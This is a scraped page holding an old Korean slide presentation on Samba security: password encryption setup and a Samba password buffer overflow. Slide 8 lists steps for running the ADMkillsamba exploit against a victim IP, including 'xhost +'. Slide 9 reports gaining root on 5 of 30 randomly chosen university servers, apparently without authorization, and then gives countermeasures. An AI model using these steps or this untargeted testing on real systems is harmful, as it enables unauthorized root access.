Presentation is loading. Please wait.

Presentation is loading. Please wait.

Samba와 보안 PLUS 오태호.

Published byMartina Simmons Modified 5년 전

Similar presentations

Presentation on theme: "Samba와 보안 PLUS 오태호."— Presentation transcript:

1 Samba와 보안 PLUS 오태호

2 목차 Samba는 무엇인가? Samba Server의 Encryption지원
Samba Server의 Buffer Overflow

3 Samba는 무엇인가? Samba is a suite of programs which work together to allow clients to access to a server's filespace and printers via the SMB(Server Message Block) protocol.

4 Samba Server의 Encryption(1)
% cat /etc/passwd | mksmbpasswd.sh > /etc/smbpasswd % chmod 600 /etc/smbpasswd % chown root `which smbpasswd` % chmod 4555 `which smbpasswd` /etc/smb.conf 안에 다음과 같이 설정 [global] encrypt passwords = yes smb passwd file = /etc/smbpasswd samba server를 재시동시킴 password를 바꿀 때는 smbpasswd 명령어를 사용

5 Samba Server의 Encryption(2)
password정보가 전송될 때 encryption되기 때문에 sniffer를 이용한 공격이 어려워짐 기존의 UNIX에서 쓰던 encryption방식과 다르기 때문에 password file을 따로 관리해야되는 불편이 있음 WindowsNT 4.0 service pack 3에서는 기본적으로 지원

6 Samba Server의 Buffer Overflow(1)
samba server로 password정보를 보낼 때 password를 길게 보내면 buffer overflow가 일어나서 외부사용자가 root권한을 획들할 가능성이 있음 samba server p1이하의 samba server는 위와 같은 buffer overflow의 가능성이 있음 ( redhat linux 4.x에 기본적으로 설치되어 있음 )

7 Samba Server의 Buffer Overflow(2)
현재 intel계열에서 작동하고 있는 samba server를 공격하는 program을 인터넷에서 구할 수 있음 (ADMkillsamba) 하지만 외부에서 buffer size와 offset을 알아내기가 힘들기 때문에 root권한을 얻기가 쉽지 않음

8 Samba Server의 Buffer Overflow(3)
공격 방법 samba source code를 구함 smb.h에서 typedef char pstring[1024]; 를 typedef char pstring[20000]; 와 같이 고침 % make smbclient % xhost + ADMkillsamba R <ip of the victim> <netbios name> <your ip> [buffsize] [offset size] 와 같은 형식으로 실행 % ADMkillsamba R ACNET buffsize와 offsetsize를 바꿔 가며 계속 시도

9 Samba Server의 Buffer Overflow(4)
학교에 있는 linux server중 30대를 무작위로 선택해서 시험해 본 결과 5대에서 root권한을 얻을 수 있었음 대책 samba server를 작동시키지 않음 samba server를 최신 version으로 교체 ftp://samba.anu.edu.au/pub/samba/

Download ppt "Samba와 보안 PLUS 오태호."

Similar presentations

SPARCS 10 이 가 영 기본 UNIX 명령어. 일단 로그인 ! Linux login 시 계정을 입력하거나 root 를 입력 Root -> # 일반 사용자 -> $ 패스워드 : echo 기능을 꺼서 볼 수 없다. 대소문자 구분 패스워드 처음 설정 시 : ~$ passwd.

SPARCS 10 이 가 영 기본 UNIX 명령어. 일단 로그인 ! Linux login 시 계정을 입력하거나 root 를 입력 Root -> # 일반 사용자 -> $ 패스워드 : echo 기능을 꺼서 볼 수 없다. 대소문자 구분 패스워드 처음 설정 시 : ~$ passwd.
7 장. 원격지에서 리눅스서버를 관리하자. 텔넷서버를 설치 / 운영한다. SSH 서버를 운영한다. VNC 서버를 설치 / 운영한다.

7 장. 원격지에서 리눅스서버를 관리하자. 텔넷서버를 설치 / 운영한다. SSH 서버를 운영한다. VNC 서버를 설치 / 운영한다.
리눅스와 보안 PLUS 오태호.

리눅스와 보안 PLUS 오태호.
정보 보안 개론과 실습 네트워크 해킹과 보안 3부 해킹 전 정보 획득 Chapter 10. 목록화.

정보 보안 개론과 실습 네트워크 해킹과 보안 3부 해킹 전 정보 획득 Chapter 10. 목록화.
MS SQL Server 2005 2009. 1 학기, 소프트웨어 설계 및 실험 ( Ⅰ )

MS SQL Server 학기, 소프트웨어 설계 및 실험 ( Ⅰ )
Chapter 10장 솔라리스 자원 관리 및 프로젝트 관리 Solaris2. 프로젝트 관리

Chapter 10장 솔라리스 자원 관리 및 프로젝트 관리 Solaris2. 프로젝트 관리
제8장 네트워킹.

제8장 네트워킹.
암호화 기술(SSL, IPSec) 손재성 권기읍 안복선 최준혁

암호화 기술(SSL, IPSec) 손재성 권기읍 안복선 최준혁
2005년 배출업소 환경관리실태 평가결과 2006. 3. 27 환 경 부.

2005년 배출업소 환경관리실태 평가결과 환 경 부.
Windows Server 2008 2장. Windows Server 2008 개요.

Windows Server 장. Windows Server 2008 개요.
PXA270 개발환경 설정 Ubuntu 실습용.

PXA270 개발환경 설정 Ubuntu 실습용.
오 태 호 POSTECH Laboratory for UNIX Security

오 태 호 POSTECH Laboratory for UNIX Security
오 태 호 POSTECH Laboratory for UNIX Security

오 태 호 POSTECH Laboratory for UNIX Security
Linux/UNIX Programming

Linux/UNIX Programming
Minicom,tftp,nfs설정,vnc설정

Minicom,tftp,nfs설정,vnc설정
목 차 1. 기 업 현 황 회 사 개 요 2. Finger Police System 개요

목 차 1. 기 업 현 황 회 사 개 요 2. Finger Police System 개요
Tftp, nfs, samba 실습 임베디드 시스템 I.

Tftp, nfs, samba 실습 임베디드 시스템 I.
리눅스와 보안 PLUS 오태호.

리눅스와 보안 PLUS 오태호.
Hostname 변경 및 Service open

Hostname 변경 및 Service open
Samba And VNC.

Samba And VNC.

Similar presentations

Ads by Google